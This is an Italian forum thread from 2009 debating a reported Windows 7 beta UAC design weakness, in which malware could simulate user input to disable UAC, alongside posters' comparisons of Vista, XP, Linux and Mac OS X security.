Scoperta una clamorosa falla nello UAC di Win7: malware può emulare il mouse e la tastiera e disabilitare lo UAC dal Pannello di Controllo senza richiedere l'autorizzazione. Infatti tutte le azioni amministrative che l'utente compie dal Pannello di controllo di Win7 non richiedono l'autorizzazione.
http://www.neowin.net/news/main/09/01/30/microsoft-malware-can-disable-uac-in-windows-7-by-design

Vi siete lamentati dello UAC di Vista? Volevate meno prompt? Ben vi sta! :ciapet: Con Win7 Microsoft vi ha accontentati, ma a discapito della sicurezza, lo UAC di Win7 si è rivelato meno sicuro di quello di Vista.

Questa è l'ennesima dimostrazione di come Vista era già un ottimo OS e che Win7 è soltanto uscito per accontentare gli utenti e basta a discapito di certe cose che in Vista erano fatte in un certo modo per un motivo valido.

Logico! :D

Anche se credo che una cosa del genere venga notata dall'utente... Che si aprano delle finestre a caso non è normale! :D
E poi con una finestra di UAC(in un desktop separato) a confermare la scelta di modificare UAC lo rendi ugualmente sicuro.

credo che basti usare un account standard e comunque si è sicuri visto che ti chiederebbe la password di amministratore per cose di questo tipo.

poi se trovano falle nella beta non può che essere un vantaggio, c'è tutto il tempo per sistemarle prima della commercializzazione

poi se trovano falle nella beta non può che essere un vantaggioNon è una falla nella beta, è un errore di progettazione. A meno che non si cambi prima dell'uscita non la puoi correggere.
E comunque basta far agire la modifica dell'UAC come un programma "non Microsoft" e quindi apparire il desktop.

Non è una falla nella beta, è un errore di progettazione. A meno che non si cambi prima dell'uscita non la puoi correggere.
E comunque basta far agire la modifica dell'UAC come un programma "non Microsoft" e quindi apparire il desktop.


beh direi che lo si debba correggere eh... se no qua de cose strane ne verranno fuori a raffica. :doh:

Non è una falla nella beta, è un errore di progettazione. A meno che non si cambi prima dell'uscita non la puoi correggere.


e quindi lo puoi correggere......
poi "nella beta" non è che lo devi leggere necessariamente come "nella build 7000"..... ma "nella fase beta" quando il tempo di rimediare c'è

Il problema non è la parola "beta", ma la parola "falla". Non è una falla, perchè funziona esattamente come progettato.

Lo dico e lo ripeto..se si vuole un sistema operativo "campione" in sicurezza allora questo non si può chiamare Windows qualcosa.
Anche per il semplice motivo che il 99% dei virus & company stanno tutti lì..quindi sarebbe proprio masochismo puro per chi pone la sicurezza come fattore primario.
Su Windows, paradossalmente, l'utente dovrebbe essere meno "utonto" che su Unix Like, Linux e Mac OS X se vuole stare davvero tranquillo..e così sempre sarà finchè gli autori di virus & company non rivolgeranno la propria mira altrove.
Questo UAC o non UAC.

Questa è l'ennesima dimostrazione di come Vista era già un ottimo OS e che...
Non è che Vista era.. VISTA è un ottimo sistema operativo e con l'uscita del SP2 che porta sia incrementi prestazionali e ulteriori miglioramenti ed affinamenti strutturali, (come nelle migliori tradizioni di casa microsoft).. camperà bene ed a lungo.. perchè è un sistema operativo solido (soprattutto la 64bit), moderno, sicuro ed efficace.

Scoperta una clamorosa falla nello UAC di Win7: malware può emulare il mouse e la tastiera e disabilitare lo UAC dal Pannello di Controllo senza richiedere l'autorizzazione. Infatti tutte le azioni amministrative che l'utente compie dal Pannello di controllo di Win7 non richiedono l'autorizzazione.
http://www.neowin.net/news/main/09/01/30/microsoft-malware-can-disable-uac-in-windows-7-by-design

Vi siete lamentati dello UAC di Vista? Volevate meno prompt? Ben vi sta! :ciapet: Con Win7 Microsoft vi ha accontentati, ma a discapito della sicurezza, lo UAC di Win7 si è rivelato meno sicuro di quello di Vista.

Questa è l'ennesima dimostrazione di come Vista era già un ottimo OS e che Win7 è soltanto uscito per accontentare gli utenti e basta a discapito di certe cose che in Vista erano fatte in un certo modo per un motivo valido.

In realtà non è una "falla", ma l'ovvia conseguenza del design di default dell'UAC in Win7.
Ovvio, e l'ho sempre detto e scritto anche in questo forum che su Win7 va impostato come era su Vista l'UAC (http://www.hwupgrade.it/forum/showthread.php?p=25342798#post25342798) per stare sicuri: al massimo livello. Non quello di default anti-rottura® per far contenti gli ignoranti abituati a 7 anni di XP e che "non vogliono essere disturbati" poverini.... :rolleyes:
Io sono felice che il sistema mi chieda, quando voglio cambiare impostazioni, il permesso di amministratore.

Lo dico e lo ripeto..se si vuole un sistema operativo "campione" in sicurezza allora questo non si può chiamare Windows qualcosa.
Anche per il semplice motivo che il 99% dei virus & company stanno tutti lì..quindi sarebbe proprio masochismo puro per chi pone la sicurezza come fattore primario.

..ma va là.. smettiamola con 'sto FUD e propaganda ideologica !!

..ma va là.. smettiamola con 'sto FUD e propaganda ideologica !!
E' un ragionamento logico che non fa una grinza.
Immaginati che ti sta molto a cuore la tua sicurezza personale e devi scegliere se passare in una palude che brulica di coccodrilli oppure in un viale alberato in terra battuta.
Cosa voglio dire ? Che Unix, Linux e Mac OS X sono più sicuri perchè ci sono meno coccodrilli più che per come sono stati progettati..pacifico no ? Ti sembra così tanto ideologico come ragionamento ? A me sembra logico.
Se poi si fa più ATTENZIONE e ci si informa..allora Windows rimarrà comunque abbastanza sicuro..ma gli "utonti" in genere non sono attenti..e se appare lo UAC premono yes senza nemmeno leggere..basta che si vada avanti.
Tutto qui..ecco perchè penso che lo UAC non sia così utile per la MASSA..lo è certamente un antivirus/antispyware&company su Windows..soprattutto se ben configurato in modo automatico.

Il problema non è la parola "beta", ma la parola "falla". Non è una falla, perchè funziona esattamente come progettato.

una falla non è che deve essere necessariamente un bug dovuto ad un'errata programmazione.

Se poi si fa più ATTENZIONE e ci si informa..allora Windows rimarrà comunque abbastanza sicuro..ma gli "utonti" in genere non sono attenti..e se appare lo UAC premono yes senza nemmeno leggere..basta che si vada avanti.

E allora è più corretto dire che Win e Vista con UAC e tutte le nuove sicurezze introdotte È PIÙ SICURO E BEN PROGETTATO e il problema è semmai dell'utonto, non di Vista (o Seven) e Microsoft.

Anche per il semplice motivo che il 99% dei virus & company stanno tutti lì..quindi sarebbe proprio masochismo puro per chi pone la sicurezza come fattore primario.Non sono daccordo, una maggiore sicurezza comunque migliora il tutto.

Quanti virus che colpiscono Vista hai sentito in questi anni? Le stesse falle che vengono riparate su Vista passano da "Critico" a "Importante".

Bisogna pensare alla sicurezza SOPRATTUTTO perchè é il sistema più diffuso.

Che Unix, Linux e Mac OS X sono più sicuri perchè

E' meglio che stai zitto perchè il sudo di linux non ha nemmeno il Secure Desktop e quindi può essere bypassato facilmente; non ci vuole niente a scrivere un programmino che resti in ascolto e catturi la password che l'utente digita nella mascherina di sudo.
Lo UAC di Vista invece è molto più sicuro del sudo di Linux in quanto la mascherina dello UAC è in una sessione separata, isolata e protetta da qualsiasi manipolazione esterna.

E' meglio che stai zitto perchè il sudo di linux non ha nemmeno il Secure Desktop e quindi può essere bypassato facilmente; non ci vuole niente scrivere un programmino che resti in ascolto e catturi la password che l'utente digita nella mascherina di sudo.
Lo UAC di Vista invece è molto più sicuro del sudo di Linux in quanto la mascherina dello UAC è in una sessione separata, isolata e protetta da qualsiasi manipolazione esterna.
Ma siccome questi "programmini" diabolici non li scrivono (o ne scrivono una percentuale ridicola rispetto al Windows)..resta più sicuro.

Non sono daccordo, una maggiore sicurezza comunque migliora il tutto.

Quanti virus che colpiscono Vista hai sentito in questi anni? Le stesse falle che vengono riparate su Vista passano da "Critico" a "Importante".

Bisogna pensare alla sicurezza SOPRATTUTTO perchè é il sistema più diffuso.
C'è anche da dire che:
Desktop market share for December 2008
Total Windows - 88.64%
Windows XP - 65.22%
Windows Vista - 21.12%
Windows 2000 - 1.47%
Windows NT - 0.34%
Windows 98 - 0.27%
Windows Me - 0.16%
Windows CE - 0.05%
Windows 7 - 0.01%
Non-Windows - 11.36%

Allora bisognava introdurre l'UAC anche in XP con la progettazione dell'SP3..e invece..

Per stare sicuri su Win7 come su Vista basta impostarlo così:
http://hosting04.imagecross.com/image-hosting-13/78221.jpg

Che vitaccia quelli di MS ;) Fanno un sistema più sicuro e vengono criticati, abbassano (a default) la sicurezza per far contenti gli utonti e vengono criticati... :ciapet:

Ma in giro per la rete è ancora pieno di incompetenti presuntuosi che si vantano addirittura di aver levato "l'inutile UAC che mi chiede anche se devo andare al cesso". Che gente triste, e convinta di aver ragione... :nono:

E allora è più corretto dire che Win e Vista con UAC e tutte le nuove sicurezze introdotte È PIÙ SICURO E BEN PROGETTATO e il problema è semmai dell'utonto, non di Vista (o Seven) e Microsoft.
Certamente..è giusto.
Ma quello che conta è il risultato finale..e io credo che un "utonto" in Windows si beccherebbe un virus & company anche con tutte le precauzioni del mondo..un utente standard con soltanto un antivirus/antispyware starebbe tranquillo..un utente esperto non se li beccherebbe nemmeno con UAC, antivirus, etc tutti disattivi.
La tipologia dell'utente pesa più di qualsiasi sistema di sicurezza che si può implementare..ma soprattutto il fattore determinante è dato dal grado di accanimento di chi sviluppa software "malevolo".

Certamente..è giusto.
Ma quello che conta è il risultato finale..e io credo che un "utonto" in Windows si beccherebbe un virus & company anche con tutte le precauzioni del mondo..un utente standard con soltanto un antivirus/antispyware starebbe tranquillo..un utente esperto non se lo beccherebbe nemmeno con UAC, antivirus etc disattivi.

Sicuramente, come altrettanto si farebbe tranquillamente fregare su Linux e MacOSX l'utonto di turno. Non vedo differenza e non capisco la critica all'OS. Da criticare è l'utonto.

Ti faccio un esempio.
Immagina di scaricare un programma su Linux o MacOSX che fa comparire un requester, o in un semplice readme dice all'utonto di turno: "Per funzionare correttamente mi devi installare da utente avanzato in modo da attivare tutte le avanzate funzionalità del programma facendo così..." Stai sicuro che l'utonto anche lì lo farebbe. Ma non mi sognerei mai di accusare la sicurezza by design dell'OS in quel caso, cosa che invece si fa per l'UAC di Vista criticandone l'efficacia solo perché l'utonto non capisce quello che fa (!?) e preme "Sì".

Tutto qui..ecco perchè penso che lo UAC non sia così utile per la MASSA..lo è certamente un antivirus/antispyware&company su Windows..soprattutto se ben configurato in modo automatico.

Invece è proprio il contrario, le grosse falle di sicurezza non sono certamente rappresentate dai virus et similia, ma dagli exploit che si possono compiere sui bug di sicurezza.

E ricordati che i nuovi virus hanno un "periodo di incubazione" durante il quale NESSUN antivirus è in grado di fermarli.

Anzi, basta modificare leggeremente la signature dei virus anche vecchi di 10 anni per rendere il sistema vulnerabile.

Su linux e mac osx non credere che la vita sia più facile. Ad esempio su debian avevano scoperto una falla grossa come una casa che aveva riguardato la generazione delle chiavi SSL degli ultimi 2 anni, e su mac osx hanno trovato un bug su safari che permetteva di prendere il controllo dell'intero sistema.

Quindi, caro mio, siamo tutti sulla stessa barca. Se proprio vogliamo trovare il sistema più vulnerabile, quello mi sa che è proprio mac osx.

Ah, chi scrive apprezza allo stesso modo tutti e tre i SO mainstream in circolazione, così evitiamo fanboysmi di varia natura.

Ah, per inciso anche a quelli che trovano l'UAC fastidioso e vorrebbero comunque che "memorizzasse" la scelta dell'utente e per questo criticavano MS: come vedete basterebbe poi uno scriptino in vbs per fregarli.

Cosa voglio dire ? Che Unix, Linux e Mac OS X sono più sicuri perchè ci sono meno coccodrilli più che per come sono stati progettati..pacifico no?Non capisco che intendi con "pacifico", però hai ragione, ma...
se appare lo UAC premono yes senza nemmeno leggere..basta che si vada avanti....Anche su tutti gli altri sistemi c'è il "sudo" che è strutturalmente meno sicuro(non che più puzzolente) di UAC perchè eleva l'intero utente per un periodo di tempo ad amministratore. UAC solo quel processo.
Anche su altri sistemi quindi lo farebbero senza leggere, portandolo allo stesso livello.
Tutto qui..ecco perchè penso che lo UAC non sia così utile per la MASSA..lo è certamente un antivirus/antispyware&company su Windows..Non sono d'accordo, se un virus non viene rilevato ma non si avvia non può fare danno. Se un Virus viene rilevato troppo tardi ormai il danno è fatto.

Il meglio è sì che venga rilevato prima, ma questo significa che l'antivirus controlli che ogni file eseguibile e libreria, prima che venga eseguito, non contenga istruzioni pericolose. Lavoro euristico dunque, che genera una gran quantità di falsi positivi.
E cosa fa un antivirus quando rileva questo? Semplice: chiede(all'interno dello stesso desktop diversamente da UAC) che il file è potenzialmente pericoloso e dunque ti consiglia di eliminarlo. Spesso causando problemi su file corretti.

UAC invece ti avvisa che quel file richiede permessi di amministrazione=>può fare danni=>Eseguilo solo se sai cosa fa, o almeno cosa ti dice di fare, indipendentemente dal fatto che possa essere o meno pericoloso.
Con l'antivirus l'utente se vuole vedere i video porno dice "Non è un virus, è un programma per vedere i video porno! Stupido antivirus" e seleziona il pulsante "ignora".

Il comportamento dell'utente è lo stesso? Sì, UAC volendo è più didattico perchè piano piano insegna a porre più attenzione a quello che si fa.
Ed è anche potenzialmente più sicuro perchè un virus te lo segnala CERTAMENTE, rispetto ad un antivirus a cui può sfuggire.


Ad un utente non esperto comunque un antivirus lo metterei, ma da qua a dire che UAC non porta vantaggi e quindi è meglio senza il passo è bello grosso...
CERTEZZA > di 99,999999999999999999999999999999%

Sicuramente, come altrettanto si farebbe tranquillamente fregare su Linux e MacOSX l'utonto di turno. Non vedo differenza e non capisco la critica all'OS. Da criticare è l'utonto.
Tuttavia essendoci MOLTI meno virus in Linux e MacOSX allora avrebbe comunque molte meno possibilità di prenderseli..e quindi starebbe più sicuro.
Non mi sembra ideologia la mia.

Allora bisognava introdurre l'UAC anche in XP con la progettazione dell'SP3..e invece..Ma fallo anche tu, no? :rolleyes:
Se sei così bravo, come quelli che portano le DX10 su XP o Linux(con prestazioni imbarazzanti), fallo. :rolleyes:

O per lo meno smettila di farti queste uscite.


(P.S. In questi due anni ho visto notizie di virus per Mac, eppure ha minore percentuale di Vista. Compreso quello per iWork pirata, che si meritano! :D ).

Non capisco che intendi con "pacifico", però hai ragione, ma...
...Anche su tutti gli altri sistemi c'è il "sudo" che è strutturalmente meno sicuro(non che più puzzolente) di UAC perchè eleva l'intero utente per un periodo di tempo ad amministratore. UAC solo quel processo.
Anche su altri sistemi quindi lo farebbero senza leggere, portandolo allo stesso livello.
Non sono d'accordo, se un virus non viene rilevato ma non si avvia non può fare danno. Se un Virus viene rilevato troppo tardi ormai il danno è fatto.

Il meglio è sì che venga rilevato prima, ma questo significa che l'antivirus controlli che ogni file eseguibile e libreria, prima che venga eseguito, non contenga istruzioni pericolose. Lavoro euristico dunque, che genera una gran quantità di falsi positivi.
E cosa fa un antivirus quando rileva questo? Semplice: chiede(all'interno dello stesso desktop diversamente da UAC) che il file è potenzialmente pericoloso e dunque ti consiglia di eliminarlo. Spesso causando problemi su file corretti.

UAC invece ti avvisa che quel file richiede permessi di amministrazione=>può fare danni=>Eseguilo solo se sai cosa fa, o almeno cosa ti dice di fare, indipendentemente dal fatto che possa essere o meno pericoloso.
Con l'antivirus l'utente se vuole vedere i video porno dice "Non è un virus, è un programma per vedere i video porno! Stupido antivirus" e seleziona il pulsante "ignora".

Il comportamento dell'utente è lo stesso? Sì, UAC volendo è più didattico perchè piano piano insegna a porre più attenzione a quello che si fa.
Ed è anche potenzialmente più sicuro perchè un virus te lo segnala CERTAMENTE, rispetto ad un antivirus a cui può sfuggire.


Ad un utente non esperto comunque un antivirus lo metterei, ma da qua a dire che UAC non porta vantaggi e quindi è meglio senza il passo è bello grosso...
CERTEZZA > di 99,999999999999999999999999999999%
Però..fra un WARNING dell'UAC e uno dell'antivirus qualcosa cambia..nel primo caso sembra uno dei soliti messaggi da mandare avanti..nel caso dell'antivirus spesso la schermata è così allarmante che magari un pochino ci rifletti.
Ad ogni modo è meglio un falso positivo che un vero negativo :) ..ecco che allora per gli "utonti" è meglio che l'antivirus sia settato in automatico.

Ma fallo anche tu, no? :rolleyes:
Se sei così bravo, come quelli che portano le DX10 su XP o Linux(con prestazioni imbarazzanti), fallo. :rolleyes:

O per lo meno smettila di farti queste uscite.


(P.S. In questi due anni ho visto notizie di virus per Mac, eppure ha minore percentuale di Vista. Compreso quello per iWork pirata, che si meritano! :D ).
Perchè dici ciò ? Non l'ho capita. Così come fra UAC e DirectX 10 c'è una enorme differenza..mah.
Se nel caso delle DirectX 10 è quasi certamente una scelta commerciale..nel caso dell'UAC, se fosse realmente così efficace per tutti, allora non oso pensare che il fattore sicurezza sia stato anch'esso sacrificato in nome dell'aspetto economico.
Detto questo..su Windows un virus non fa più notizia..su MacOSX (o Linux) certamente si.

In rapporto diffusione/falle windows è il sistema più sicuro. Il resto sono solo chiacchiere da bar e barzellette raccontate da CEO imbonitori per vendere i prodotti.

Invece è proprio il contrario, le grosse falle di sicurezza non sono certamente rappresentate dai virus et similia, ma dagli exploit che si possono compiere sui bug di sicurezza.

E ricordati che i nuovi virus hanno un "periodo di incubazione" durante il quale NESSUN antivirus è in grado di fermarli.

Anzi, basta modificare leggeremente la signature dei virus anche vecchi di 10 anni per rendere il sistema vulnerabile.


Assolutamente vero.
È la peggior cosa che esista credere e far credere che un sistema con un AV sia automaticamente sicuro. Così vorrebbero farti credere le varie Norton etc. ma la vera sicurezza viene da privilegi (diritti utente) ridotti.
È sbagliatissimo affidarsi all'AV convinti che acchiappi e intercetti tutto: è come credere che mettere una guardia sbadata dove c'è una porta spalancata sia più sicuro che mettere una porta chiusa e impenetrabile.

IMHO è questo che danneggia l'utonto e fa nascere la piaga del malware e dei virus: l'opera di convincimento fasullo fatto dai venditori di antivirus che dicono a tutti che con il loro AV sei al sicuro. In questo modo, ancora oggi l'utonto esegue tutti i crack che trova in giro pensando ingenuamente: tanto ho l'AV attivo... :doh:
Questo sì che andrebbe combattuto, non fare delle discutibili critiche a Micorosft sulla sicurezza.

un utente standard con soltanto un antivirus/antispyware starebbe tranquillo...E che differenza c'è da "l'utonto con tutte le precauzioni"? L'utenza standard è parte della precauzione massima. Basta essere sicuri che quel programma ti faccia vedere i porno per non farlo cancellare dall'antivirus.
La protezione massima è UAC senza avere la password dell'amministratore, così che anche se ignori l'antivirus non lo esegui.
un utente esperto non se li beccherebbe nemmeno con UAC, antivirus, etc tutti disattivi.L'utente esperto che non naviga per siti pericolosi, qualunque browser utilizzi.

Per stare sicuri su Win7 come su Vista basta impostarlo così:No, basta che ad ogni modifica di UAC indipendentemente dal livello attuale mostri il desktop sicuro.

Ah, per inciso anche a quelli che trovano l'UAC fastidioso e vorrebbero comunque che "memorizzasse" la scelta dell'utente e per questo criticavano MS: come vedete basterebbe poi uno scriptino in vbs per fregarli.No, non è vero. Se la scelta venisse fatta con una casella di controllo dentro al desktop sicuro, abbinata all'eseguibile memorizzato in quel percorso, se vogliamo anche con quell'hash, non può comunque essere superata. ;)

In rapporto diffusione/falle windows è il sistema più sicuro. Il resto sono solo chiacchiere da bar e barzellette raccontate da CEO imbonitori per vendere i prodotti.
La sicurezza si misura in numero di sistemi operativi infettati su base installata..e qui non credo proprio che il rapporto porti Windows in vetta.
E ripeto..non lo credo perchè altri sistemi operativi siano progettati meglio..ma perchè infinitamente meno tartassati.

Però..fra un WARNING dell'UAC e uno dell'antivirus qualcosa cambia..nel primo caso sembra uno dei soliti messaggi da mandare avanti..nel caso dell'antivirus spesso la schermata è così allarmante che magari un pochino ci rifletti.[QUOTE]Allora cambiamo la schermata di UAC.
[QUOTE]Ad ogni modo è meglio un falso positivo che un vero negativo :) ..ecco che allora per gli "utonti" è meglio che l'antivirus sia settato in automatico.Non hai capito il discorso, vero?

L'ultima riga:
CERTEZZA > 99,99999999999999999999999999999999999999999999999999%

UAC da la certezza, perchè ti becca tutti i "falsi positivi" che un antivirus può beccare e quindi certamente quelli veri.
Un antivirus, come ti è già stato spiegato, può essere facilmente superato cambiando leggermente l'impronta virale. UAC no.

Tuttavia essendoci MOLTI meno virus in Linux e MacOSX allora avrebbe comunque molte meno possibilità di prenderseli..e quindi starebbe più sicuro.
Non mi sembra ideologia la mia.

Certo, e se giri con Haiku (http://www.haiku-os.it/) non hai nemmeno 1 virus! Meglio che Linux e MacOSX, pensa!
Scusa ma non capisco dove vuoi arrivare. Stai affermando che è colpa di Windows e quindi è meglio usare un'altro OS?
È una tesi ridicola per tutti i motivi di cui sopra, il cui perno centrale è: il problema è e sempre sarà l'utonto, non l'OS.

[QUOTE=xsim;26077609]Però..fra un WARNING dell'UAC e uno dell'antivirus qualcosa cambia..nel primo caso sembra uno dei soliti messaggi da mandare avanti..nel caso dell'antivirus spesso la schermata è così allarmante che magari un pochino ci rifletti.[QUOTE]Allora cambiamo la schermata di UAC.
Non hai capito il discorso, vero?

L'ultima riga:
CERTEZZA > 99,99999999999999999999999999999999999999999999999999%

UAC da la certezza, perchè ti becca tutti i "falsi positivi" che un antivirus può beccare e quindi certamente quelli veri.
Un antivirus, come ti è già stato spiegato, può essere facilmente superato cambiando leggermente l'impronta virale. UAC no.
Adesso non esageriamo..l'euristica becca anche qualcosa che non è possibile trovare nel proprio database.
L'UAC di per se becca tutto..ok..positivi e negativi..e un utonto cliccherà yes sempre..anche perchè sembra un messaggio per nulla allarmante.

Se nel caso delle DirectX 10 è quasi certamente una scelta commerciale..Certo, infatti le implementazioni su XP e Linux sono scadenti, e non parliamo di 2-3% che potrebbero dipendere da una implementazione diversa delle funzioni. DX10 si basa sulla gestione della memoria di Vista che è completamente diversa da quella di XP.

UAC è peggio! Una gestione completamente diversa dei permessi dell'utente, non si può cambiare il sistema con un SP. Specie se il sistema è bucato prima dell'installazione, non servirebbe a nulla.

La sicurezza si misura in numero di sistemi operativi infettati su base installata..

Appunto. Sei sicuro che su un miliardo di PC la percentuale di quelli infettati sia così alta?

Scusa ma non capisco dove vuoi arrivare. Stai affermando che è colpa di Windows e quindi è meglio usare un'altro OS?
È una tesi ridicola per tutti i motivi di cui sopra, il cui perno centrale è: il problema è e sempre sarà l'utonto, non l'OS.
No..il contrario..sto dicendo che NON è colpa del Windows ma del fatto che è l'unico sistema operativo che davvero interessa chi sviluppa software malevoli.
Ed ecco che allora per avere più sicurezza tocca spingersi in un prato verde piuttosto che districarsi in un campo minato.
Logica..non ideologia..non me ne frega un caxxo di usare quello piuttosto che quello per questioni ideologiche.

[...]

Allora bisognava introdurre l'UAC anche in XP con la progettazione dell'SP3..e invece..

Beh, si può sempre installare Sudowin su Windows XP e usarlo con un account utente limitato.

Appunto. Sei sicuro che su un miliardo di PC la percentuale di quelli infettati sia così alta?
Già l'indice dei virus (& company, parlo di qualsiasi pezzo di software scritto con fini poco nobili) usciti settimanalmente la dice lunga..e quindi accrescono le possibilità di beccarsene uno.

No, non è vero. Se la scelta venisse fatta con una casella di controllo dentro al desktop sicuro, abbinata all'eseguibile memorizzato in quel percorso, se vogliamo anche con quell'hash, non può comunque essere superata. ;)

Sì certo... e una volta memorizzata la scelta ci hai pensato? Con quello stesso identico VBS disabiliterai l'UAC.

Certo, infatti le implementazioni su XP e Linux sono scadenti, e non parliamo di 2-3% che potrebbero dipendere da una implementazione diversa delle funzioni. DX10 si basa sulla gestione della memoria di Vista che è completamente diversa da quella di XP.

UAC è peggio! Una gestione completamente diversa dei permessi dell'utente, non si può cambiare il sistema con un SP. Specie se il sistema è bucato prima dell'installazione, non servirebbe a nulla.
L'UAC concettualmente non mi sembra chissà che cosa..secondo me in XP era implementabile senza RIVOLUZIONI.
Per le DirectX 10 non saprei..ma secondo me anche quello.
Ma a quel punto allora staremo ancora con un Win95 SP578.

La sicurezza si misura in numero di sistemi operativi infettati su base installata..La tristezza si misura in litri di lacrime, per esempio io una volta ero triste 13 litri. :rolleyes:
Per lo meno, Elio e le storie tese le canzoni le scrivono con lo scopo di far ridere.

La sicurezza non si misura perchè non è misurabile. La sicurezza è un dato valutabile, si può valutare in base alla difficoltà nel bucare il sistema.

Il computer staccato dalla rete è più sicuro di uno collegato ad internet perchè:

Computer staccato:
Devi essere fisicamente presente sulla macchina.

Computer attaccato ad internet senza firewall:
Puoi sfruttare eventuali falle per eseguire delle operazioni ANCHE(parola magica) senza essere nelle vicinanze.

Computer attaccato ad interneto con firewall(hardware):
Devi avere i diritti per accedere alla rete locale, quindi devi sfruttare una eventuale falla per accedere alla rete locale, E sfruttare eventuali falle per eseguire delle operazioni.

L'UAC di per se becca tutto..ok..positivi e negativi..e un utonto cliccherà yes sempre..anche perchè sembra un messaggio per nulla allarmante.Già risposto, mettiamo più allarmante la finestra di UAC.

No..il contrario..sto dicendo che NON è colpa del Windows ma del fatto che è l'unico sistema operativo che davvero interessa chi sviluppa software malevoli.
Ed ecco che allora per avere più sicurezza tocca spingersi in un prato verde piuttosto che districarsi in un campo minato.
Logica..non ideologia..non me ne frega un caxxo di usare quello piuttosto che quello per questioni ideologiche.

La tua logica finisce quando si dimostra illogico dover cambiare città, casa, macchina (per fare un parallelo) se sopraggiunge un piccolo problema. Gli utenti hanno protestato per piccoli cambiamenti di abitudine da XP a Vista, figuriamoci ogni tot anni (dopo che l'OS di turno più usato sarà impestato dai Virus) dover ogni volta reinventare la ruota... :mbe:

Pensaci bene: non è meglio invece educare gli utonti a cosa sono i permessi e farne uso? E insegnargli che le ditte di antivirus ti prendono in giro quando ti convincono che installare un AV = stare sicuri sul proprio PC, invece di dirti l'unica verità: gira gratis con privilegi ridotti?

L'UAC concettualmente non mi sembra chissà che cosa..secondo me in XP era implementabile senza RIVOLUZIONI.


No no, era penetrabilissimo per tanti motivi, tra cui (sempre paragonato a Vista) mancanza totale di seria e netta separazione utente/admin (es. il Superuser di XP!!), mancaza di protezioni come il DEP (solo parzialmente presente), l'ASLR, SEHOP, Integrity Levels etc. etc.
Vista non ha solo l'UAC per essere più sicuro. È sbagliato credere che XP fosse altrettanto sicuro semplicemente girando con account user invece che admin come di default. Vista offre ben altro ma mi sa che la gente è molto poco informata su Vista e infatti non mi sorprende la ahimé scarsa reputazione che hanno affibbiato a questo buon OS.

Sì certo... e una volta memorizzata la scelta ci hai pensato? Con quello stesso identico VBS disabiliterai l'UAC.Eh? Di che parli?

Una volta memorizzata la scelta ti ritroverai un file criptato con le informazioni. UAC una volta avviato un file in cui vede l'impostazione come sicuro(da una chiave di registro) controlla che l'impronta coincida(stesso ragionamento delle password). Se non coincide cancella la chiave e mostra la finestra.

Questa è la soluzione a livello di memorizzazione, lo stesso livello di protezione delle password.

Eh? Di che parli?

Una volta memorizzata la scelta ti ritroverai un file criptato con le informazioni. UAC una volta avviato un file in cui vede l'impostazione come sicuro(da una chiave di registro) controlla che l'impronta coincida(stesso ragionamento delle password). Se non coincide cancella la chiave e mostra la finestra.

Questa è la soluzione a livello di memorizzazione, lo stesso livello di protezione delle password.

Guarda che con un VBS che imita gli input utente passa tranquillamente DOPO CHE L'UTENTE HA MEMORIZZATO... riflettici meglio. Sarebbe un'altro "design flow".

Guarda che con un VBS che imita gli input utente passa tranquillamente DOPO CHE L'UTENTE HA MEMORIZZATO... riflettici meglio.Eh?

Se l'utente ha memorizzato l'abilitazione allora è logico che passa: è l'utente che ha detto essere sicuro.

Eh?

Se l'utente ha memorizzato l'abilitazione allora è logico che passa: è l'utente che ha detto essere sicuro.
Non hai capito: una volta che è stato salvata l'impostazione secondo cui è "sicuro" eseguire quell'app senza UAC requester, se ti imito gli input event per arrivare lì siamo punto e a capo: tramite quello stesso VBS ti disattivo l'UAC. Il problema di design criticato nel primo messaggio di questo thread è quello: non confermare ogni volta che si lanciano le impostazioni non è sicuro.

Non hai capito: una volta che è stato salvata l'impostazione secondo cui è "sicuro" eseguire quell'app senza UAC requester, se ti imito gli input event per arrivare lì siamo punto e a capo: tramite quello stesso VBS ti disattivo l'UAC. Il problema di design criticato nel primo messaggio di questo thread è quello: non confermare ogni volta che si lanciano le impostazioni non è sicuro.Ma perchè? L'hai letto il mio messaggio?

Ti conviene rileggere che non hai capito.

Ma perchè? L'hai letto il mio messaggio?

Ti conviene rileggere che non hai capito.

No sei tu che mi sembra non abbia capito che non è questione di rendere sicura la memorizzazione della preferenza utente ma semplicemente che il problema è che se non c'è conferma da Amministratore ogni volta che si toccano le impostazioni, saranno modificabili tramite vari trucchi tra cui il più semplice è quel VBS.
Se invece mi stai dicendo di far comparire l'UAC SOLO SE le impostazioni sono cambiate è un altro discorso, ma ha poco senso ;) perché se lanci l'eseguibile per cambiare le impostazioni di solito è perché le vuoi cambiare quindi un requester di conferma ti compare in tutti e due i casi (con memorizzazione ma check-cambiamento, o UAC forzato).

Sia ben chiaro..io NON sono contro l'UAC..ma per un suo ulteriore sviluppo..ossia renderlo ancora più efficace (con un messaggio più allarmante per esempio, ma non soltanto).
Ed inoltre se per navigare in internet (per fare un esempio) utilizzo Linux con Firefox 3 invece del Windows con Internet Explorer (so che c'è anche Firefox..lo so) non mi sento un alieno..ma un pò più tranquillo si. ;)
Ma NON sono nemmeno contro Windows..fa quasi miracoli visto quanto è tartassato..avrei voluto vedere altri sistemi operativi nell'occhio del ciclone.
Certo..la struttura del registro, l'NTFS e altre cosucce non l'aiutano..

Ed inoltre se per navigare in internet (per fare un esempio) utilizzo Linux con Firefox 3 invece del Windows con Internet Explorer (so che c'è anche Firefox..lo so) non mi sento un alieno. ;)

E qui ricasca l'asino (scusa eh ;)) perché IE7/Vista con Modalità protetta + DEP è più sicuro di FFox/Vista, sempre che tu sappia cosa sono la Modalità protetta e il DEP...
Anche quelli di mozilla la invidiano:
https://wiki.mozilla.org/Mozilla_2/Protected_mode
https://wiki.mozilla.org/Firefox/Feature_Brainstorming:Security

il problema è che se non c'è conferma da Amministratore ogni volta che si toccano le impostazioni, saranno modificabili tramite vari trucchi tra cui il più semplice è quel VBS.Quel programma non funziona nel desktop sicuro!

Quindi a meno che l'utente non lo disabiliti manualmente, e in questo caso quel programma è completamente inutile, è sicuro.


Se invece dici che l'utente può memorizzare la scelta di non avvisare la modifica di UAC, consentiamo ai programmi progettati apposta di impostare un valore che vieti la memorizzazione.
I programmi vecchi non ce l'hanno e quindi non vedono differenze, quelli nuovi che non sono progettati per la sicurezza o continuano a non impostarlo o lo impostano negativamente, mentre quelli nuovi che sono critici come UAC stesso o un programma antivirus lo impostano positivamente.

UAC lo vede, non cerca se quel file è stato contrassegnato come sicuro e mostra la finestra senza la casella di controllo.

Certo..la struttura del registro, l'NTFS e altre cosucce non l'aiutano..Queste sono le frasi che la gente che non sa, tira in ballo.
